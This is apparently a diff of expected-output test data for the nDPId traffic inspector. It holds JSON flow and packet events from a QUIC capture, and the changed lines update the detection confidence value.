02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1621496437543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496437543,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYKNAAH4RaeQ0uxSvxkodT\/KiAbsFTtIIyv8AAB0IvPCERtRr\/7QAAEU0VDep\/CZnpIQa8eVhNyJ3U1QCAukLnPnKtOrC\/7zKB1G+98eg7ftwXdiCu4mjtl1Q8mNJOaDHQdHo\/ZnotZk2q+6WYBr5DXX5QHa13JOYGLxoc9qyOjz+jbwetc54i8U7+0kSHAbALiGoIDK5WQRRZWetkNux+DZoWjHY5WfosmGRQsxtOixsR3jt9j7FOo4uqSxQGhtqIeA0i25755C0K1hzCtZHRQuy55gnoUo6zZiPhelVtIcqgCilkIu+IaiAgPdY8qusu3Q9ASMkRkk0UX5H8nUY5fVDgGL4DjsJROTA71uUmNZenr0sr5JOl\/aDX74AH3H77h7yG8JDcWCMqta2iHG5v7LfQn6HD8EvX8A9+X1BPgSNN1do76JMe5qE+cL6FAAbPHwnyEKr00VkR3NF0Wj71jZ14VH7imUBnL66mFh+udQFwSu20vdM9c8XD4z8cDkFHoqTsPkKjRGkjCQi8gB1gYo0m\/YFj+JeaePbkDvq0OSLPaTj\/\/uR93wYJiwS6oC\/aiMrt4Ai7n7\/FG5FTHmyLQWtwhpvmSeJKiasDEobo8lDxko0INCDfgQfJ3SBS6Viiln\/ASliXjKWu4SrneUfwv6qaK5CsTzFRpoqdrt\/s\/4hApSQqHe2ymAF3JbfHyoRulU2oXzj3PnMlAj4Z4Vj4oik802VNCwqS9rwhkgwLpg2ForHv0BBRPYvL6MVNDpoeE6Q+fkjAsxQcCry3Tg\/0ntsyB77pU9N+6ViiIk\/seArDaEwUpWw96CaP6HGoEH+ITzRBw4NaVx1WIIOT111vCFZOdJbhxCcjcGlkWUXH2Mfa710gWwLlFOy8LDSs50FqSN\/OPohmIvSl5JLifaSN0t8gyVjvGme43FCNf1IRmz\/msB0elm4bS6ud+82racQS6O6aZIJmDUDJkR4HH9e\/YL1z+2ASyQ94Fzatzpb4GFKnXYPSRR9ZXr+nLzhoRIUWJY27XaWKYbXR\/JgJvZqSpd9j1Y9iIYmFAj\/kzwA1TDOawG0jmZJvOHRbLPdttFMT9Z8ICzQz7sbYr50LzOCpscApRYi0yCxCW+7FvKkaUxLEeqVZNTb5bfzGXSqygFSO8Onu18Vfr2pGmZ97fTY05vmeNRaTdGB9GDxEB+of1UDIaNk5S6UGJN8C0OX2skQW9hdlLAoFJbl3R\/kaaNQomNrWf12eVjbEPUwYduxDkiFO\/Cu3xI8s\/1bhAxAoo1eoosHRSb+RfuzYRRHXHaCwK0syV2XsapF5fct1hE0QKESIuGMqkYTacUhiZ+am2170YsnbIH6mCpW2GWX2kdp\/NRfot7wqoww4YL4kQ0dV2zP8iVLBMwBcBBj7jRlAJPmU94cd1+2yA9MIjBhwW2o6kySfxuLx1CH1XTXYxyDRbLVbIkYJ9KjklyMjtPqIcfNaglBMiG4bD+cmIuV+JVF2yBdmwLpupy8GkZrPVtTuFpepOJxWGxrxdE4LNF44zdCZCWF5fsbh0tA\/4QNVZd3EvAFmb9igKxLlVrUdRexT5v0zY8qkBoP74MZTTSWxXbGUHSlroYRRVjE1ko2j801gomU8QxZIsnLdQPtAkZ1hEimDc88Y35XyX679476yZ\/aqcOmLMYDbu0Vw3kbH\/S1Pi\/Q6fIKsIvYN8tlqc6ZQKWv4iCbutDJNK0I1762s\/zDONmC7qcwhUo\/1eKb+bifa8jDvxqbQH5WTi1a8brNLoMOVpui\/c73ZoNVIkMLLnI\/xxYiZknhsfNiaQgxORr7sklMg7Kd\/f31pN0pVpaR"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1621496437852,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496437852,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYK5AAH4Radk0uxSvxkodT\/KiAbsFTi+oyv8AAB0IvPCERtRr\/7QAAEU0JaLtoHyofbRbg8jGkawveiyJ2UaoheXbSYuPTeMKCeIU77lABrfhjW\/KFsoqVpaP9JKJMlnvWCAfrhYhpHkJG+xvxdGDmZWYW6e1KGN5t8DibwD+sY7U6We2yL0NMOrSYyY67PZ33CEYMgrO+bU1ma8i3+NoKnZhxsjAkaglJ6uAUozF4XuimP6iU+KzggGtZ5AHeHRJJSrIijvm2uURkPI\/Zf52SGLY+vL4vQPTe7wS1EKJeXUmQgYmh2aup9vLeWlDTkRpMf1EwpwHNlukj5oBWVeoeBmaQD4sx+NuopJ+2QprYWTuKVJ508tJ6HgsW5Ot7jO5bBygYTExm8AhqCnq4UjBmnft2hLhbA7\/d3ydVpIp7qFrWPv9n07PW58yXrAf70XLdskX2QCxfb2EahbYmb3Vx+DoN9ZQfyauIGIQJ4G4xs7NSUBH1KpzLXiWyZKGC2bhtRyON+3HzPjWFxkL0Tfa80\/+SxEpgasrCwJQb+1o6V\/lNwqybT5vHn79PHBIvEpedoaDM+BEu+O79uo27iS8RNPO794dIBqh+wJSlgKlH5zeUshHAvvFJn1TFlqv8TRVbuRhgffiNiYg0o1CeqH6Zf28VhJJpbsJJD4AZ\/jSirQZxHEWJI7alxgK\/LiDdkgpKDEWpc3pue7siiUI86wkuQp3ziUbYYUwf+3S2XmN4C+TOxmkT5fxEIOXMUz4o9qBlMvVx+HeJXeP4+1XADUariBmhpvXNO6nl8VgSR05a2jc1zcSQm6hoH7Sjq19QDV7jFEfc7eLbvAvOLM23DWJ+wh4NpHj9pZdPlAmebA1IRONzVUDs+FLPzEH62RBEORoAtOT4e39cJai5gPk0i6dU0vofBLpifIxzMyKYaGd4qxHI1hU\/vumyHtthijttX3+DFdn3RYaqCp1LpOaUmoX\/6sMVu8m0LGWnwhQqFoSAeJsuv14Al7ULvCdbJM06GXHtuP8hOpztz8GERiD3IE4+pHtQzzeOFwW3gBxM8vb\/kgHuBEO3Ngo3tjKIHZU34x718MZS7qAptuEPHVkm+ESamOD7xBmeB3Lqe2ntH0yaZ0R1ojSk6QGp9l\/DQGTgYlqqmVVplJJS9Mq23y4sYJANTI+VTWYMkD6NqRCbwxSayYlRmpI0bsWTBa3Egd5P7LRpi+3cNo9ZuEhXIAF3ycXIYlhzeSYSYvtqmdmjkTzNQLLrulkQ5zCYRtkU4zvk\/g9mgS2CcfxLTkjgtei6kwqIx3Nk4h0E0OZscgKCSJf4cRmCCOmfcnN0SQlWhChNjlpr8NXwxRXP\/99Mm1hVM9\/1cJQ8UoVQJDRNojN3SkiUl26oijeQfH807azHA\/97ACgXT19Mdl1O3NlO9Iz\/csL8LLesYa1qB5z+IjimX42W8TXFqTRlbQ7oeAmIc8H5U32U0xeqTwvh76ZUT0WO\/Hpn0xBlv6aqBcKb1Cxl7JTIzz67aCTV66YXN8NeR593i1+u0PvZCPySYf5PqAIuY3yAjXufep0Fzzko0vw1dgNNd1cSLqgPBALOXp4QpvYDsh5OdOzrPtb9Bwn8\/YjM65iU1fQJwe0pFgWPBk3OLAC1ivEA1X2opEADJmIj\/+8LvIdF6nYgzKjVtmvtV9atGouRJomruCL8JxrFfNeHoRpx0yRl9yU\/q2BGWdEuqEHO6y7Tbfu0SWUkh49LajcNcpvqE+bJljstNdRH3yFDQnBncwCCqj4zSbXWQeeQR2mI+3rqRgA1HwOB+cQZChDPCGByW10tu7BtVyE7\/y\/Y+sF"} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1621496438462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496438462,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYK9AAH4Radg0uxSvxkodT\/KiAbsFTjIVyf8AAB0IvPCERtRr\/7QAAEU0a1V3BXBwEIhDElH\/1qUxqcqfVK\/U+I3pv8jXB6GKoLcClwfi5i+JVRi\/+qOD0jSHpVm+CcmsqV2quEgqGH5Gn0rihcbJDGj870ULZI4KmDKfC69q5r6675Wy4U0x28m2t5DK6rGqmJIfuY4CLJ5+JpnAGepaot5zw988NS9MjaUUAwJq0KRJTk9TQLF3FkyUeCnv+L2\/mCZ4pQPvTUHoai0BPsJAkEBQbCDT0ne2qov3gwfXPyGYjT+qpU1DonWmFNb695dnTcteFv3XvXkEd58E8n7ydtguTKEpl548CM+1ZWTRyyMlXz4XZF8nSLIMx0GUIZgZvabVLDS2+F0B521wAlGhNrm8PRINe9rBVvQYcP4xgohRdv3nDuVcLpMwOSEXj4YWgyE3ZUgeAzYB\/H75MXEyWx2rB05U\/7TWZ7NlkA33O50sz9d4a2o1c3cNntoxGwlEfyLKcihZ\/Suz\/KxirS++R\/qp01ueSmHonRfmrrM1LSGcMyKd+Oc4e5KssoiJAFl2Nso9pSh\/Hc4LC0BNO2pv99cb2fqWMrvtg4RKbfx1R5ZiccoCxgCpi46Y\/bGbfrDImS2xG9ERCTD6jtG0jRR1KV9w3yPJD6dZUx9vPrSlfE7TRtUvV2tg2P8RQt\/NsSQk3\/7JpfMhAIPApofSUgXm0f7r+8Zw1J12aP1zZsU9ZyRmQPc6usI4DXJN8WSrOMAw2YJx5dHRsAS5bRsxti2UCq\/PcqbnjXZexpjegsnkWKYnN\/pwtZdssK+ny+99042hifAuhg\/BXmwZfuFZ7LWOinb0yOszMgV4GVujdcSyRmmJB+im4Mj4o509W5k04dZ0bDE52gnvESt2EXA8x4iUBeMzV1EC9VoL2Zd72WZ2Le8+\/S0MFe3Se8D\/liSQe5dY3M\/L+3ZXq\/9nfvzioEORhqMqj8nSgClQeG9dmdKGgxM5mcQ9CeGNozwRdxhJvWFmctGZQ2NjWDhhDHDaqU259Q3FvsbElzHVdrJ5mJ0Cxf9ajFKPgkVOGdrDG9ApKtfsvTm8mcEa8n0Q62eOymCVJqvif5jaYy+ecjinMVsEogfItZgW86yqnm54hcKotzJtaFtp3CA5T0NjiL0VfXkiOTKfOXVWtwS2R+LPX1ibd8kfkwAh\/XXkesEqkGqJKfxtLjiY18HS1YhU3t6JkzeJqPLrJB\/PbFwyElYds\/6m0\/g+LOXOZ67UcdCScV0su9cTzTbpFuilpU31PFlGsAgDKmvkZLzN7jt\/kqOCXoWwgg9bPQkbwwNwl54A9eMPW3BHZk0poDKL2DWdoWQmTEsHc0pqdf\/k0atEtrhXPDE6dm9ctnyGia88NrHpejAS5iOiAf1eL4iWXQNTQkLKwlOqi0oh5WENqyW2gdD3O5vPNDr95MLc6Nk9E3B2M+6BndVVw6tTuGClOXozYuEVgbdPUEQGHunkA\/dCQkelRbanSo5cdvMQPWbxeU5G497tiSuxNDfmsujYTz\/BK6JWmejCS\/KhAJaMKx7PrcrPsaNqhZU4Mn4\/jSs11bYdbYsLm+pMXqsl9X68WqxfFniiajHo\/Fd3P7UYw9qKzJA5hFllxa12+AedgC513u0kPjxtExQUdI3b78Ms+FaM6UYc1IOQ6tYJC\/kR00xvH3J0uZZ0HafuTIIxCiV49M2ik73I2gkK\/TLa9hQf1LFJjsPj9VPpRxrc2Ly1SzJ7P1j6ovi9NMEeR\/e7+QcpnMJTH1C\/dGDgaTfjeelKzH0zIUwM4v73ZogzQ+Q6mOQCAb1RAyJQ"} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496439665,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496439665,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":136,"packets-processed":135,"total-skipped-flows":0,"total-l4-payload-len":182250,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":93,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":93,"total-idle-flows":92,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":420,"global_ts_msec":1621497523457} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1621497523457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621497523457,"pkt":"AAAAAAAAAAEA737VCABFAAViBEZAAH4RSb6okEAFI8KdL9kJAbsFTlfcy\/8AAB0IhCcF96VVR0wANwBlELxIAYrJ18RJAopwESH080EDiTGBxAUIotc1YUcdQDx6Fm+qNXboDChqvIPFhdQk4GOqHNpE\/bcP8275wY0w3P5\/OBD00jBZFIIxdkIc1CxBuDirFHD1tP5B64vwQ5D8UGBMCwXBE5r8cQBEBueMDl1wCzedkaTPJndcvmabltC3xUmd0wwNZF33vrM44e1g6fvolfFIRSR585LU+EPiXYcJSO8XezQCKfsKP9OZPhOtv83h2Ovh66Ofu5lyKK97w1ZRH4fHbdZfIN43raCsZSEISB1XWpjeStwCQgX4pxEVT3bu7OPulibsntpcBDvvUq8hjhYS\/PbA9GsLf8ab2oDiv9nzg4n5gSjTjYJYqGNdpo8pvu3k0XjbFxeoYR+3bONBa+e0\/V5cimHNpgKrVTimMaMMdAFaY6tT7OKkXataUcGKIOpI4ClrI1RfjXBlfZBLOZbQ1ruqGWnukjIXOQ89MmoF02WXH\/OXh+KKRAFzwlapiv\/cQ9QlO9JZ0BB+POvvg0IQYksHMghnQAgMTrJM4innxppRZzBoWz9zsOmK6XhRhELNfRCbi4bc5YsBdjiD3ijjj0vhvLYkE8cmxkLuJ0qhNxl3p6hz2KHodGMRRnCY7+yW4\/w95\/W2ZXETMOaiPG4P8rFj6ml8\/VAIeNI42nP1oow2vPc0sprOkAOau2yfl6UbQppTRhQbTZO9wnp0+pb\/YLR560RKcRxZ6gUiuP4fRQpX1VnT9F+IXXx+\/hKRHGdtC446mKetR0R2fffEU3RdpszGGUSJYY9vViq2Eomp2NB2XsGSDZ7grvOQePwuxkF\/VdXMAKr33SX3CCDNZsxfwsHeafmqicnZBNljaecFtLy\/+9HYZeH3f2cDOX3K2VDbGR9cx+8R4uBk0EX\/px+zKszwuAcjJAvJeXJiBBoZwb1OylfJtFW0xyteXH7T57KNedRu+91GNpzswbrgQyjlkhovo1OK0t72ahVmG3ci4ldbaNoM9Er9o1PA3dEHVxpZIkVGwMvOCLlkTsNn7BvKy8UOqhGyMtxMVZXmLf+vQAImY7kO\/JmvUFXGBjLGGoDqDl13TqPutG44hrxR02KIBhULXqIMEKZ0qrvWpm\/\/odFSsCLPU5KX8gvQDTeNqgXvhS5yCTtJ\/E1FTIQ62Whbkz803oSWqHMyB9PTWsfyUOvQ\/rOPfM2Hp8037xRyvZ557yfBRFUiv70NQLV2Zzve\/8q4\/+h+Fri1+bTl59+RUidiY1TO3qvxPwSqJrc\/iUXUAxTJ\/iVUXyZcuGGc8bsiOTTBgqyOg9Hj4pZ\/3cKkgSVM8pOpKr\/hPcaL1tH1m5MiC8PYtFySKzAit5RXN62RM\/yP3bFdJNWXn3q6vSa6Nwy+6UJmoWNwQrB89OTwcDbVLvIvUrUOYSdw5tw4rl8hCKo38y10qvUFE7S\/vxva\/p2Znrp2ZVkSxayvzUJu3VFimVxiL3A7sYZs6c\/thutzyxZvCEQ2Ehf93l2gbRl7+GjjrhvbWDav5GzhJ32x7RnRqMQA6g7ihAB1sROsstlfmwTAaFrKCBAN7dq4qC4xFv28ox5F9z+6hjCXyOJStyP4WcjK+tovRhkLpdG2Wvd9PUpQyVc7n2VNtkJqiMlfYa2ialoeXEG2XlWpLp8Nvi5ARgJCTGZFWy91dkcCOz8sVye7XwnEDxu0kn98A2gCBLP47MxjqlsbBe\/36a444Y35PEcLtU3xUP\/8uuTpLZz8LGaII+NM3hazyvTcHrfjqZ0yk555T\/\/FaKekILXf"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621496437543,"flow_last_seen":1621496439665,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621496437543,"flow_last_seen":1621496439665,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1621498081522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498081522,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYQ5AAH4RYvGfdbB8xkodT+8SAbsFTkZmwf8AAB0ItDBJ3NIuqUkAAEU0zVGaIK6UyDHeyNAcp56wwNTOdBKN2bGwgH3tSTiVxSqi5R4I7f3uL1yCaFlIdaYH9ahQKvndRKo\/ujk3\/jxfEcgto9i3futX9okj4XQ27PcefMGWgXqyEVg4FX77CSecDnTaNTLYfhgkDYQuCO970H4hixxovH+9p7Rv9dvjx2i\/DEJUGfnU896aVLuBnPuODO552k7IJaY3oWgEK0rlPQEiGu8iNHDYQvoHxEBatHMnsyOw8Zigvseo1jujk6RJI1A1aOg7YO9cAhzx\/u6chL22xzxaN0rZh\/N0XhIF0NwNbCTSv0YxaADYXS+ZMZCfG7i\/c1SF\/TLgIw2\/Cpu3F3+\/J3snQsx2Ypa323eXtmuMVPdZd7ZS0JAerklF6xQ2sS1MAkHYoaZwJeMEuKsLN21trT43ZhRptSf2u\/vwUGzprigY38cgmz2P0F11GVoj57z4wh7UcQjKtTWJ2849\/MydU8igJwJBLHMPRTXx3H\/BMY\/XLs5QxfEEe2tglHiHmbbq4PzWF3eT6ivMr1fu4KfSTFrTevi80ysJLj74VjHcpduKqVQEAr3Nrxo29\/LtT2\/2SjRuE1\/QZ3jNaoc+VKacJ1OxFmMjy6MGm5g4zuGOU4PfB50I\/VqTXCdTlUAmTY7aw9cTfWQym2+3JjrSCgWg2UbNSgsB3L2is4KZ\/0e1da4EhbjUCPTE2G4aoj83FMSovFWop7f5UAVm40K7Ty5x83R2EbPCd85UuGSIQ2TY5rEz31oaGw7pNUiRlzOkMPY\/3kFEfS4kT75iAaOiXzSFUXwVh+46V1ZvA3YWe8YCrMaHZgPxkOMYQixK5m4kE4DpD+kTtbvG+rGsitiIx92TiXWXi\/RueKekCBAIO6DDqnNSDioHQ1qgtwcpgfVl0ej2qxMeg3DrsiZDxeOV77mCA0L84J68iQzb1jxQzp5GdP+Apo6zOF9Td3oDYFxp1\/2YnjbYkDZQumseur2wImpbnrAdoRFORnbxALxWRA1dZjITPJHmekQRA4kxEp7\/Z97odl+ObDogC\/\/cAhnq4DfOJz00T4RdEcO081yUNcS\/FEvbg7B9sbjDCedDS\/stwrNGitySwmE3scR+aZKyKBtqHCMiWVQOhXlWVUJyKHlfU1lb6W5mDBMyxAaJZZTfI8GB+zZV2rexPCKIqBy5N0iq6rwIiMUn5CKijk2bKXIzCqSDbqrJxJnrHf0vns3v74qpefAZDni0SOFc+2DykFX6NEtdNgoW92KE\/mvxeaIXMyLuEr1rBY8P21x+u9Hj4lI28mV2TP+OvII1F78tH5muJnBp38Ls4t00WNUM5qvDRCPn\/qCJOJupXtqxmax1I5E+sxFqbI2+QyiNd1xNWeS7bPXPPjVGS6cu9MwsecO+R9Qv\/1VhgxscP2kZ797YzaYhjw8bmnZS2O1uUm9CvlrYQdUxSRwLgY\/jIY2w8pvuF\/hO7kVAMYVHGPH+IQO1SY77GbyF4u4k4xFwBDkhIKR\/nOX3lmm4FtHy0hlq\/6nXLfGvIypcoaMaaBFB9hx0m5XnnTxSnIC1vhW1FDclKSyzUy\/ddRX22aL8vOR30NpJH4RlJ6ueGVM641FEst\/rh1nK6cglWyn3\/dXRMIw7QDsXh1ijz9s95X0SsUD8hNmRuTzlhnVPs0rxOtkDr0ojHFIvCB+gp4SNVj0YldDojIlR0\/3Dn7VAGDCem9vEBUBT2YeMkbsNoFcGF9yx+tHZxAZUN6i3I67NHiOw\/T+jxUqj\/K95lSH+zdgQfLf1aBtau7gu"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": 